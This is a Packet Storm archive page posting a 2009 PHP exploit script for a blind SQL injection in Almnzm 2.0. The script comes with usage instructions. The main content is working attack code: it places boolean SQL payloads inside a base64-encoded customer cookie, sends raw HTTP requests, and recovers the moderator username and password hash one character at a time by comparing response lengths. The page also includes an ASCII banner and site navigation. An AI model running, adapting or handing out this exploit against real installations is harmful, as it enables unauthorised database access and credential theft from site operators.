exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Almnzm 2.0 Blind SQL Injection

Almnzm 2.0 Blind SQL Injection
Posted Jul 2, 2009
Authored by Qabandi

Almnzm version 2.0 remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | a4566be3216cdcc097188b52bebb3f584fc367f4570d76f5f2d6cec7e9a93db7

Almnzm 2.0 Blind SQL Injection

Change Mirror Download
<?php
ini_set("max_execution_time",0);
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .

___________________
_/QQQQQQQQQQQQQQQQQQQ\__
[q] Almnzm 2.0 Blind SQL Inj. __/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
[q] Cookie <3 /QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
[q] https://www.almnzm.com |QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
[/] -[Tam al tableegh]- \QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
______________________________________________________________________________
/ \
| hediya, because i finished exams |
\______________________________________________________________________________/
\ No More Private /
`````````````````
');

if ($argc<6) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/ user_id username password
example: php '.$argv[0].' almnzm.com /demo/ 1 almnzm test
-----------------------------------------------------------------------------
');
die;
}
function QABANDI($victim,$vic_dir,$user_id,$user_name,$user_pass,$injection){
$host = $victim;
$usrid= $user_id;
$usrnm= $user_name;
$usrpw= $user_pass;
$p = "https://".$host.$vic_dir;

$user_id_inj = $usrid.$injection;
$qookie = base64_encode($user_id_inj."[:-:]".$usrnm."[:-:]".md5($usrpw));
$packet ="GET ".$p."index.php?a=customerarea HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: customer=".$qookie.";\r\n";
$packet.="Connection: Close\r\n\r\n";

$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}

fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);

$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}

return $data;

}

$host1 = $argv[1];
$userdir1=$argv[2];
$userid1= $argv[3];
$username1= $argv[4];
$userpass1= $argv[5];






if ($argc > 2) {

echo "\nPlease wait, this will take time, el9abr zain ;)\n";
$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
echo "\nExploiting:\n";
$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {

$q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0");

$laenge = strlen($q);
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}


if ($j>9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i));
}

if ($j<=9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i));

}



if (abs((100-($laenge/$r*100))) > $t-1) {


if ($j>9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
}
if ($j<=9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));

}





if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}


if ($j>9){

$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i);


}

if ($j<=9){

$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i);


}


$laenge = strlen($hg);

if (abs((100-($laenge/$r*100))) > $t-1) {


if ($j>9){

$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
}

if ($j<=9){

$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
}



if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close